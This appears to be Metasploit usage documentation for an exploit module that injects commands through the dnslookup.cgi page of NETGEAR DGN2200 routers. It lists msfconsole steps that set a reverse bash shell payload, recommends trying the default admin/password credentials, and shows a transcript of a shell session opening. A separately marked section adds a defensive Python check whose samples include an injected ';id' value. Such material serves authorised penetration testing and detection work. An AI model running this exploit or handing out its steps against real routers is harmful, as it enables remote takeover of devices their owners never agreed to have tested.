## Vulnerable Application

  NETGEAR DGN2200v1, DGN2200v2, DGN2200v3, DGN2200v4 routers

## Verification Steps

  1. Start `msfconsole`
  2. `use exploit/linux/http/netgear_dnslookup_cmd_exec`
  3. `set RHOST 192.168.1.1` (the router's IP)
  4. `set USERNAME xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
  5. `set PASSWORD xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
  6. `set PAYLOAD cmd/unix/reverse_bash`
  7. `set LHOST 192.168.1.x`
  8. `set LPORT xxxx`
  9. `run`
  10. Get a session

## Options

  **USERNAME**

  The `USERNAME` option sets the username to authenticate the request with.
  The command injection will __not__ succeed if the username and password are not correct.
  The default username for NETGEAR Routers is `admin`. If you don't know the credentials,
  your best bet will be to use the default username and password.
  
  
  **PASSWORD**
  
  The `PASSWORD` option sets the password to authenticate the request with.
  The command injection will __not__ succeed if the username and password are not correct.
  The default password for NETGEAR Routers is `password`. If you don't know the credentials,
  your best bet will be to use the default username and password.
  
## Advanced Options
  
  **HOSTNAME**
  
  The request is sent with a `host_name` POST parameter, and this option sets its value.
  The default is `www.google.com`. The parameter is needed because the file that contains
  this vulnerability (`dnslookup.cgi`) actually needs a domain to resolve, or else
  the injection won't work.
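
  A defensive counterpart to the `host_name` behaviour described above, added here as an example and not part of the module or the router firmware: an allow-list check that flags POSTs to `dnslookup.cgi` whose `host_name` value is not a syntactically valid hostname. The request path `/dnslookup.cgi`, the function names and the sample requests are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# One RFC 1123 label: letters, digits, hyphen; no leading or trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def is_valid_hostname(value: str) -> bool:
    """Allow-list check: True only for a syntactically valid hostname."""
    if not value or len(value) > 253:
        return False
    if value.endswith("."):          # a single trailing root dot is legal
        value = value[:-1]
    return all(_LABEL.fullmatch(label) for label in value.split("."))


def check_request(method: str, path: str, body: str) -> list:
    """Return findings for one HTTP request; an empty list means clean."""
    target = path.split("?", 1)[0]
    if method.upper() != "POST" or not target.endswith("/dnslookup.cgi"):
        return []
    # parse_qs percent-decodes values, so encoded characters are seen as sent.
    params = parse_qs(body, keep_blank_values=True)
    return [
        f"host_name is not a hostname: {value!r}"
        for value in params.get("host_name", [])
        if not is_valid_hostname(value)
    ]


# Constructed sample requests (method, path, body); not captured traffic.
SAMPLES = [
    ("POST", "/dnslookup.cgi", "host_name=www.google.com"),
    ("POST", "/dnslookup.cgi", "host_name=www.google.com%3Bid"),
    ("GET", "/index.htm", ""),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        findings = check_request(method, path, body)
        print(method, path, "ALERT" if findings else "ok", findings)
```

  The check accepts only what a hostname can contain instead of listing characters to reject, so the same function can serve as input validation in front of any resolver call.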
  

## Scenarios

  What it should look like against a vulnerable router.

  ```
msf > use exploit/linux/http/netgear_dnslookup_cmd_exec 
msf exploit(netgear_dnslookup_cmd_exec) > options

Module options (exploit/linux/http/netgear_dnslookup_cmd_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password to authenticate with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                      yes       The target address
   RPORT     80               yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME                   yes       Username to authenticate with
   VHOST                      no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   NETGEAR DDGN2200 Router


msf exploit(netgear_dnslookup_cmd_exec) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(netgear_dnslookup_cmd_exec) > set USERNAME admin
USERNAME => admin
msf exploit(netgear_dnslookup_cmd_exec) > set PASSWORD password
PASSWORD => password
msf exploit(netgear_dnslookup_cmd_exec) > run

[*] Started reverse TCP double handler on 192.168.1.9:4444 
[+] Router is a NETGEAR router (DGN2200v1)
[*] Sending payload...
[*] Command shell session 1 opened (192.168.1.9:4444 -> 192.168.1.9:53352) at 2017-03-02 19:36:47 -0500
```
  
